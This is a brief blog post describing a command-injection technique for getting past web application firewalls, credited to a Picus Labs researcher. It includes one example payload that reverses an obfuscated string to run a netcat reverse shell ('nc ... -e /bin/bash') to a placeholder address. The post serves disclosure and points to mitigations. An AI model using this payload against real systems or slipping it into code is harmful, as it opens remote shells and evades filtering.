WAF bypass by PicusSecurity

Date: November 30, 2020Author: wafbypass

A command injection WAF bypass method discovered by Picus Labs researcher
@evrnyalcin
.

It uses “rev” and “printf” commands in command substitution.

Example: $(printf ‘hsab/nib/ e- 4321 1.0.0.721 cn’|rev)

Read the write-up for details and mitigations:

Subscribe for the latest news:

Web application firewalls bypasses collection and testing tools